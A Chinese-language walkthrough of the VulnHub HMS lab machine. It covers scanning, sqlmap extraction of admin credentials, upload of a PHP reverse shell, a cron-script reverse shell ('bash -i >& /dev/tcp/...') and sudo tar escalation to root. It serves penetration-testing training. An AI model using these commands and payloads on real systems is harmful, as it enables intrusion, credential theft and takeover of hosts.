靶机描述
靶机地址:https://www.vulnhub.com/entry/hms-1,728/
Description
easy
This works better with VirtualBox rather than VMware
一、搭建靶机环境
攻击机Kali:
IP地址:192.168.9.7
靶机:
IP地址:192.168.9.63
注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式)
该靶机环境搭建如下
- 将下载好的靶机环境,导入 VritualBox,设置为 Host-Only 模式
- 将 VMware 中桥接模式网卡设置为 VritualBox 的 Host-only
二、实战
2.1网络扫描
2.1.1 启动靶机和Kali后进行扫描
方法一、arp-scan -I eth0 -l (指定网卡扫)
arp-scan -I eth0 -l
⬢ Hms arp-scan -I eth0 -l
Interface: eth0, type: EN10MB, MAC: 00:50:56:27:27:36, IPv4: 192.168.9.7
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.2 08:00:27:21:a2:cb PCS Systemtechnik GmbH
192.168.9.63 08:00:27:07:33:23 PCS Systemtechnik GmbH
2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.976 seconds (129.55 hosts/sec). 2 responded
方法二、masscan 扫描的网段 -p 扫描端口号
masscan 192.168.184.0/24 -p 80,22
方法三、netdiscover -i 网卡-r 网段
netdiscover -i eth0 -r 192.168.184.0/24
方法四、等你们补充
2.1.2 查看靶机开放的端口
使用nmap -A -sV -T4 -p- 靶机ip查看靶机开放的端口
⬢ Hms nmap -A -sV -T4 -p- 192.168.9.63
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-01 10:02 CST
Stats: 0:03:22 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.60% done; ETC: 10:05 (0:00:02 remaining)
Nmap scan report for bogon (192.168.9.63)
Host is up (0.00043s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.9.7
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 3c:fc:ed:dc:9b:b3:24:ff:2e:c3:51:f8:33:20:78:40 (RSA)
| 256 91:5e:81:68:73:68:65:ec:a2:de:27:19:c6:82:86:a9 (ECDSA)
|_ 256 a7:eb:f6:a2:c6:63:54:e1:f5:18:53:fc:c3:e1:b2:28 (ED25519)
7080/tcp open http Apache httpd 2.4.48 ((Unix) OpenSSL/1.1.1k PHP/7.3.29 mod_perl/2.0.11 Perl/v5.32.1)
|_http-server-header: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/7.3.29 mod_perl/2.0.11 Perl/v5.32.1
MAC Address: 08:00:27:07:33:23 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.43 ms bogon (192.168.9.63)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 242.48 seconds
⬢ Hms
21—ftp—vsftpd 3.0.3–Anonymous FTP login allowed (FTP code 230)
22–ssh—OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
7080—http—Apache httpd 2.4.48 ((Unix) OpenSSL/1.1.1k PHP/7.3.29
2.2枚举漏洞
2.2.1 21端口分析
根据扫描结果可知,ftp可通过anonymous 无密码登录
⬢ Hms ftp 192.168.9.63
Connected to 192.168.9.63.
220 (vsFTPd 3.0.3)
Name (192.168.9.63:hirak0): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||29239|)
150 Here comes the directory listing.
226 Directory send OK.
ftp> cd /home
550 Failed to change directory.
ftp>
啥也没有
2.2.2 7080 端口分析
访问:http://192.168.9.63:7080/
是一个登录表单,先放一边
扫描一下目录:gobuster dir -u http://192.168.9.63:7080 -x html,zip,bak,txt,php --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
⬢ Hms gobuster dir -u http://192.168.9.63:7080 -x html,zip,bak,txt,php --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.9.63:7080
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: html,zip,bak,txt,php
[+] Timeout: 10s
===============================================================
2022/04/01 10:37:44 Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 302) [Size: 14041] [--> login.php]
/login.php (Status: 200) [Size: 4087]
/profile.php (Status: 302) [Size: 13736] [--> login.php]
/files (Status: 301) [Size: 239] [--> http://192.168.9.63:7080/files/]
/pages (Status: 301) [Size: 239] [--> http://192.168.9.63:7080/pages/]
/header.php (Status: 200) [Size: 4924]
/signup.php (Status: 200) [Size: 6514]
/footer.php (Status: 200) [Size: 1783]
/test.php (Status: 200) [Size: 6]
/logout.php (Status: 200) [Size: 48]
/head.php (Status: 200) [Size: 1741]
/connect.php (Status: 200) [Size: 1]
/sidebar.php (Status: 200) [Size: 2238]
/forgot_password.php (Status: 200) [Size: 5614]
/department.php (Status: 302) [Size: 13653] [--> login.php]
/medicine.php (Status: 302) [Size: 13972] [--> login.php]
/doctor.php (Status: 302) [Size: 16844] [--> login.php]
/phpmyadmin (Status: 403) [Size: 1190]
/treatment.php (Status: 302) [Size: 13963] [--> login.php]
/setting.php (Status: 302) [Size: 16372] [--> login.php]
/appointment.php (Status: 302) [Size: 16267] [--> login.php]
/changepassword.php (Status: 302) [Size: 13858] [--> login.php]
/patient.php (Status: 302) [Size: 18076] [--> login.php]
===============================================================
2022/04/01 10:43:26 Finished
===============================================================
⬢ Hms
访问:http://192.168.9.63:7080/files/
访问:http://192.168.9.63:7080/pages/
访问:http://192.168.9.63:7080/phpmyadmin
并没有什么其他发现
2.3漏洞利用
2.3.1 SQL注入测试
尝试SQLmap一把梭一下
执行命令sqlmap -r test.sql --batch --dbs
成功爆破出数据库
available databases [6]:
[*] clinic_db
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
爆数据表sqlmap -r test.sql --batch -D clinic_db --tables
Database: clinic_db
[24 tables]
+----------------------+
| user |
| admin |
| appointment |
| billing |
| billing_records |
| department |
| doctor |
| doctor_timings |
| manage_website |
| medicine |
| orders |
| patient |
| payment |
| prescription |
| prescription_records |
| room |
| service_type |
| tbl_email_config |
| tbl_permission |
| tbl_permission_role |
| tbl_role |
| tbl_sms_config |
| treatment |
| treatment_records |
+----------------------+
爆字段sqlmap -r test.sql --batch -D clinic_db -T admin --col
Database: clinic_db
Table: admin
[17 columns]
+---------------+---------------+
| Column | Type |
+---------------+---------------+
| addr | varchar(500) |
| created_on | date |
| delete_status | int(11) |
| dob | text |
| fname | varchar(50) |
| gender | varchar(500) |
| id | int(11) |
| image | varchar(2000) |
| last_login | date |
| lname | varchar(500) |
| loginid | varchar(30) |
| mobileno | text |
| notes | varchar(200) |
| password | varchar(100) |
| role_id | int(11) |
| updated_on | date |
| username | varchar(500) |
+---------------+---------------+
爆值
sqlmap -r test.sql --batch -D clinic_db -T admin -C username,loginid,password --dump
Database: clinic_db
Table: admin
[1 entry]
+----------+------------------------+---------------------------------------------------+
| username | loginid | password
+----------+------------------------+---------------------------------------------------+
| admin | ndbhalerao91@gmail.com | aa7f019c326413d5b8bcad4314228bcd33ef557f5d81c7cc977f7728156f4357
+----------+------------------------+---------------------------------------------------+
拿到账户密码,不过密码应该是加密过的
试试手工注入看看能不能进入后台
删掉 type 字段,
成功登录进入后台
进行信息收集,在http://192.168.9.63:7080/setting.php发现可以上传文件
尝试上传webshell
但是不知道上传到哪里了
查看一下源码看看有没有路径啥的
看到了上传路径
尝试访问:http://192.168.9.63:7080/uploadImage/Logo/php-reverse-shell.php
kali本地监听:nc -lvp 6666
⬢ Hms nc -lvp 6666
listening on [any] 6666 ...
Warning: forward host lookup failed for bogon: Host name lookup failure : Resource temporarily unavailable
connect to [192.168.9.7] from bogon [192.168.9.63] 38846
Linux nivek 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
12:32:08 up 2:33, 0 users, load average: 0.00, 0.01, 0.19
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
sh: 0: can't access tty; job control turned off
$
成功拿到shell
使用 Python 切换至交互式shell:python -c 'import pty;pty.spawn("/bin/bash")'
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
daemon@nivek:/$
2.4权限提升
2.4.1 信息收集
简单信息收集一波
daemon@nivek:/$ sudo -l
sudo -l
[sudo] password for daemon:
Sorry, try again.
[sudo] password for daemon:
Sorry, try again.
[sudo] password for daemon:
sudo: 3 incorrect password attempts
daemon@nivek:/$ ls -al
ls -al
total 104
drwxr-xr-x 23 root root 4096 Apr 1 10:11 .
drwxr-xr-x 23 root root 4096 Apr 1 10:11 ..
drwxr-xr-x 2 root root 4096 Apr 1 10:07 bin
drwxr-xr-x 3 root root 4096 Apr 1 10:12 boot
-rw------- 1 root root 0 Jul 25 2021 core
drwxr-xr-x 19 root root 4220 Apr 1 11:48 dev
drwxr-xr-x 137 root root 12288 Apr 1 10:12 etc
drwxr-xr-x 4 root root 4096 Jul 26 2021 home
lrwxrwxrwx 1 root root 33 Apr 1 10:11 initrd.img -> boot/initrd.img-4.4.0-210-generic
lrwxrwxrwx 1 root root 32 Apr 1 10:11 initrd.img.old -> boot/initrd.img-4.4.0-21-generic
drwxr-xr-x 23 root root 4096 Jul 26 2021 lib
drwxr-xr-x 2 root root 4096 Jul 25 2021 lib64
drwx------ 2 root root 16384 Jul 25 2021 lost+found
drwxr-xr-x 4 root root 4096 Jul 26 2021 media
drwxr-xr-x 2 root root 4096 Apr 21 2016 mnt
drwxr-xr-x 3 root root 4096 Jul 25 2021 opt
dr-xr-xr-x 144 root root 0 Apr 1 09:59 proc
drwx------ 19 root root 4096 Jul 26 2021 root
drwxr-xr-x 27 root root 1080 Apr 1 10:13 run
drwxr-xr-x 2 root root 12288 Apr 1 10:07 sbin
drwxr-xr-x 2 root root 4096 Apr 1 10:09 snap
drwxr-xr-x 3 root root 4096 Jul 25 2021 srv
dr-xr-xr-x 13 root root 0 Apr 1 09:59 sys
drwxrwxrwt 8 root root 4096 Apr 1 12:35 tmp
drwxr-xr-x 10 root root 4096 Jul 26 2021 usr
drwxr-xr-x 16 root root 4096 Jul 25 2021 var
lrwxrwxrwx 1 root root 30 Apr 1 10:11 vmlinuz -> boot/vmlinuz-4.4.0-210-generic
lrwxrwxrwx 1 root root 29 Apr 1 10:11 vmlinuz.old -> boot/vmlinuz-4.4.0-21-generic
daemon@nivek:/$ cd /home
cd /home
daemon@nivek:/home$ ls -al
ls -al
total 16
drwxr-xr-x 4 root root 4096 Jul 26 2021 .
drwxr-xr-x 23 root root 4096 Apr 1 10:11 ..
drwx-----x 4 eren eren 4096 Jul 26 2021 eren
drwxr-xr-x 16 nivek nivek 4096 Jul 26 2021 nivek
daemon@nivek:/home$ cd eren
cd eren
daemon@nivek:/home/eren$ ls -al
ls -al
ls: cannot open directory '.': Permission denied
daemon@nivek:/home/eren$ cd /home/nivek
cd /home/nivek
daemon@nivek:/home/nivek$ ls -al
ls -al
total 104
drwxr-xr-x 16 nivek nivek 4096 Jul 26 2021 .
drwxr-xr-x 4 root root 4096 Jul 26 2021 ..
-rw------- 1 nivek nivek 425 Jul 26 2021 .bash_history
-rw-r--r-- 1 nivek nivek 220 Jul 25 2021 .bash_logout
-rw-r--r-- 1 nivek nivek 3771 Jul 25 2021 .bashrc
drwx------ 13 nivek nivek 4096 Jul 26 2021 .cache
drwx------ 14 nivek nivek 4096 Jul 26 2021 .config
drwxr-xr-x 2 nivek nivek 4096 Jul 26 2021 Desktop
-rw-r--r-- 1 nivek nivek 25 Jul 25 2021 .dmrc
drwxr-xr-x 2 nivek nivek 4096 Jul 26 2021 Documents
drwxr-xr-x 2 nivek nivek 4096 Jul 26 2021 Downloads
drwx------ 2 nivek nivek 4096 Jul 26 2021 .gconf
drwx------ 3 nivek nivek 4096 Jul 26 2021 .gnupg
-rw------- 1 nivek nivek 942 Jul 26 2021 .ICEauthority
drwx------ 3 nivek nivek 4096 Jul 26 2021 .local
-rw-r--r-- 1 root root 33 Jul 25 2021 local.txt
drwx------ 5 nivek nivek 4096 Jul 26 2021 .mozilla
drwxr-xr-x 2 nivek nivek 4096 Jul 26 2021 Music
drwxr-xr-x 2 nivek nivek 4096 Jul 26 2021 Pictures
-rw-r--r-- 1 nivek nivek 675 Jul 25 2021 .profile
drwxr-xr-x 2 nivek nivek 4096 Jul 26 2021 Public
-rw-r--r-- 1 nivek nivek 0 Jul 25 2021 .sudo_as_admin_successful
drwxr-xr-x 2 nivek nivek 4096 Jul 26 2021 Templates
drwxr-xr-x 2 nivek nivek 4096 Jul 26 2021 Videos
-rw------- 1 nivek nivek 50 Jul 26 2021 .Xauthority
-rw------- 1 nivek nivek 1354 Jul 26 2021 .xsession-errors
-rw------- 1 nivek nivek 1788 Jul 26 2021 .xsession-errors.old
在 shell 中寻找 suid 程序:find / -perm -u=s -type f 2>/dev/null
daemon@nivek:/home/nivek$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/ping
/bin/mount
/bin/fusermount
/bin/su
/bin/ping6
/bin/umount
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/newgidmap
/usr/bin/bash
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/at
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/sbin/pppd
/opt/lampp/bin/suexec
daemon@nivek:/home/nivek$
在https://gtfobins.github.io查找到bash
daemon@nivek:/home/nivek$ /usr/bin/bash -p
/usr/bin/bash -p
bash-4.3$ id
id
uid=1(daemon) gid=1(daemon) euid=1002(eren) groups=1(daemon)
bash-4.3$ whoami
whoami
eren
bash-4.3$
成功切换至eren用户
bash-4.3$ sudo -l
sudo -l
[sudo] password for daemon:
Sorry, try again.
[sudo] password for daemon:
Sorry, try again.
[sudo] password for daemon:
sudo: 3 incorrect password attempts
没法搞,继续查看相关文件,看一下有没有可以利用的
bash-4.3$ cd /home/eren
cd /home/eren
bash-4.3$ ls -al
ls -al
total 40
drwx-----x 4 eren eren 4096 Jul 26 2021 .
drwxr-xr-x 4 root root 4096 Jul 26 2021 ..
drwxr-xr-x 2 eren eren 4096 Jul 26 2021 backups
-rwxr-xr-x 1 eren daemon 95 Jul 26 2021 backup.sh
-rw------- 1 eren eren 1 Jul 26 2021 .bash_history
-rw-r--r-- 1 eren eren 220 Sep 1 2015 .bash_logout
-rw-r--r-- 1 eren eren 3786 Jul 26 2021 .bashrc
drwxrwxr-x 2 eren eren 4096 Jul 26 2021 .nano
-rw-r--r-- 1 eren eren 675 Sep 1 2015 .profile
-rw-rw-r-- 1 eren eren 66 Jul 26 2021 .selected_editor
bash-4.3$ cd backups
cd backups
bash-4.3$ ls -al
ls -al
total 12
drwxr-xr-x 2 eren eren 4096 Jul 26 2021 .
drwx-----x 4 eren eren 4096 Jul 26 2021 ..
-rw-rw-r-- 1 eren eren 3400 Apr 1 12:45 backup.tar.gz
bash-4.3$ cd ..
cd ..
bash-4.3$ cat backup.sh
cat backup.sh
#!/bin/bash
BACKUP_DIR="/home/eren/backups"
tar -zcvpf $BACKUP_DIR/backup.tar.gz /var/www/html
bash-4.3$ cat .bash_history
cat .bash_history
bash-4.3$
看到这个备份脚本,可能跟定时任务有关
咱们查看一下定时任务文件
bash-4.3$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
*/5 * * * * eren /home/eren/backup.sh
bash-4.3$
发现每隔五分钟运行一次backup.sh
咱们可以通过在 /home/eren/backup.sh 中写入 shell进行提权
echo "bash -i >& /dev/tcp/192.168.9.7/6666 0>&1" >> backup.sh
bash-4.3$ ls
ls
backups backup.sh
bash-4.3$ echo "bash -i >& /dev/tcp/192.168.9.7/6666 0>&1" >> backup.sh
echo "bash -i >& /dev/tcp/192.168.9.7/6666 0>&1" >> backup.sh
bash-4.3$ cat backup.sh
cat backup.sh
#!/bin/bash
BACKUP_DIR="/home/eren/backups"
tar -zcvpf $BACKUP_DIR/backup.tar.gz /var/www/html
bash -i >& /dev/tcp/192.168.9.7/6666 0>&1
bash-4.3$
kali本地监听一下nc -lvp 6666
⬢ Hms nc -lvp 6666
listening on [any] 6666 ...
Warning: forward host lookup failed for bogon: Host name lookup failure : Resource temporarily unavailable
connect to [192.168.9.7] from bogon [192.168.9.63] 38848
bash: cannot set terminal process group (20361): Inappropriate ioctl for device
bash: no job control in this shell
eren@nivek:~$ id
id
uid=1002(eren) gid=1003(eren) groups=1003(eren)
eren@nivek:~$ sudo -l
sudo -l
Matching Defaults entries for eren on nivek:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User eren may run the following commands on nivek:
(root) NOPASSWD: /bin/tar
eren@nivek:~$
发现可以用root权限运行/bin/tar
去https://gtfobins.github.io查找一下
运行该命令
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
eren@nivek:~$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
</dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
tar: Removing leading `/' from member names
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls
Desktop
Documents
Downloads
Music
Pictures
Public
root.txt
Templates
Videos
cat root.txt
299c10117c1940f21b70a391ca125c5d
成功提权,并拿到flag
总结
本靶机通过SQL注入登录后台,找到文件上传点,上传反弹shell拿到shell,通过/usr/bin/bash切换用户,然后通过在 /home/eren/backup.sh 中写入 shell,最后通过tar提权
- 主机发现
- 信息收集
- 目录扫描—gobuster
- SQLmap一把梭
- sql手工注入进入后台
- 文件上传漏洞
- sudo提权—tar提权
扫一扫
451
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
